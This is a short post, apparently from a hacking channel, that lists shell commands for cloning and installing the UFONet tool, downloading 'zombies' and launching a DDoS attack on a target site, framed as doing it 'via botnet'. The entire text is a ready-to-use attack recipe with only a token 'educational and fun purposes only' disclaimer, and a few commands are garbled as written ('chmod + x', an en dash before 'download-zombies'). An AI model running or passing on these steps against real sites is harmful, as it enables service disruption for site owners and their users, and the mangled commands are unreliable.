Linux Hacking Tools
DDOS ATTACK

HOW TO PERFORM DDOS ATTACK AS YOU’RE DOING IT VIA BOTNET
Do this only on Linux distr.:
🔹apt update && apt upgrade
🔹git clone https://github.com/epsylon/ufonet.git
🔹cd ufonet
🔹pip3 install GeoIP
🔹pip3 install python-geoip
🔹pip3 install pygeoip
🔹pip3 install requests
🔹pip3 install pycrypto
🔹pip3 install pycurl
🔹pip3 install whois
🔹pip3 install scapy-python3
🔹chmod + x setup.py
🔹chmod + x ufonet
🔹python3 ufonet –download-zombies
🔹python3 ufonet -i sitehere
⚠️This is for educational and fun purposes only